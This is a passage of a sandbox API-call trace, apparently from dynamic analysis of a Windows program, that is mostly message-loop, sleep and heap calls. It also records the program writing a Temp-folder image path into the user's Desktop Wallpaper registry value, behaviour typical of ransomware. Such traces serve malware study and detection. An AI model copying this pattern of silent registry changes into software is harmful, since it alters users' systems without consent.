wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.548] Sleep (dwMilliseconds=0xa) [0255.608] timeGetTime () returned 0x117fbd2 [0255.608] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.608] Sleep (dwMilliseconds=0xa) [0255.633] timeGetTime () returned 0x117fbf2 [0255.633] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.633] Sleep (dwMilliseconds=0xa) [0255.654] timeGetTime () returned 0x117fc04 [0255.654] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.654] Sleep (dwMilliseconds=0xa) [0255.694] timeGetTime () returned 0x117fc30 [0255.694] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.694] Sleep (dwMilliseconds=0xa) [0255.707] timeGetTime () returned 0x117fc40 [0255.707] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.707] Sleep (dwMilliseconds=0xa) [0255.734] timeGetTime () returned 0x117fc55 [0255.735] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.735] Sleep (dwMilliseconds=0xa) [0255.802] timeGetTime () returned 0x117fc9e [0255.802] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.802] Sleep (dwMilliseconds=0xa) [0255.821] timeGetTime () returned 0x117fcad [0255.821] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.821] Sleep (dwMilliseconds=0xa) [0255.833] timeGetTime () returned 0x117fcbd [0255.833] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.833] Sleep (dwMilliseconds=0xa) [0255.849] timeGetTime () returned 0x117fccc [0255.849] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.849] Sleep (dwMilliseconds=0xa) [0255.863] timeGetTime () returned 0x117fcdc [0255.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.863] Sleep (dwMilliseconds=0xa) [0255.879] timeGetTime () returned 0x117fcec [0255.879] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.879] Sleep (dwMilliseconds=0xa) [0255.955] timeGetTime () returned 0x117fd2a [0255.955] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.955] Sleep (dwMilliseconds=0xa) [0255.972] timeGetTime () returned 0x117fd49 [0255.972] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.972] Sleep (dwMilliseconds=0xa) [0255.989] timeGetTime () returned 0x117fd59 [0255.989] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0255.989] Sleep (dwMilliseconds=0xa) [0256.034] timeGetTime () returned 0x117fd78 [0256.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0256.034] Sleep (dwMilliseconds=0xa) [0256.051] timeGetTime () returned 0x117fd98 [0256.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.053] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0256.079] TranslateMessage (lpMsg=0x8cf968) returned 0 [0256.079] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0256.079] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0256.079] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.079] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0256.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0256.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0256.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0256.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0256.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0256.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0256.084] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4e8 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0256.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.084] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0256.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0256.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0256.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0256.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0256.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0256.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0256.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a735d8 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0256.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0256.086] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0256.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0256.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0256.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0256.086] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0256.086] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0256.113] RegCloseKey (hKey=0x3c0) returned 0x0 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a735d8 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0256.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0256.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.114] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0256.115] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0256.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0256.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0256.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0256.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0256.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0256.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0256.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0256.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0256.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0256.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0256.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0256.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0256.119] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0256.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0256.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0256.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0256.120] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0256.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0256.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0256.121] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0256.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0256.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0256.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 